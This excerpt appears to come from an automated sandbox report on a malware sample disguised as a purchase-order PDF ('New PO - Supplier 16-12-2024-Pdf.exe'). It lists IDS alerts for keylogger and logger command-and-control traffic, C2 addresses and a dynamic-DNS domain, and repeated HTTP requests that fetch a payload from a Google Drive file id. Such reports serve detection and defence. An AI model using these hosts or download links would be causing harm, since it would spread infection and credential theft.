                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49916 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49917 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49946 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49943 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49968 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49967 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50001 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50004 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50021 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50023 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50031 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50033 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50058 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50061 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:50062 version: TLS 1.2
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00EA2044
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00EA219F
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_00EA24A9
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E96B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_00E96B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E96E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_00E96E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_00E9F350
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_00E9FDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E6DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_00E6DD92
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9FD47 FindFirstFileW,FindClose,9_2_00E9FD47
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: excel.exeMemory has grown: Private usage: 2MB later: 69MB

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.6:49751 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.6:49876 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49876 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49769 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49971 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50073 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50139 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.6:50146 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50146 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50147 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.6:50154 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50154 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50150 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50153 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49742 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49787 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49759 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49741 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49760 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49774 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49811 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49777 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49812 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49823 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49799 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49855 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49870 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49788 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49832 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49881 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49800 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49893 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49820 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49846 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49833 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49854 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49845 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49864 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49871 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49894 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49862 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49880 -> 142.250.185.78:443
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Uses dynamic DNS services
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,9_2_00EA550C
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
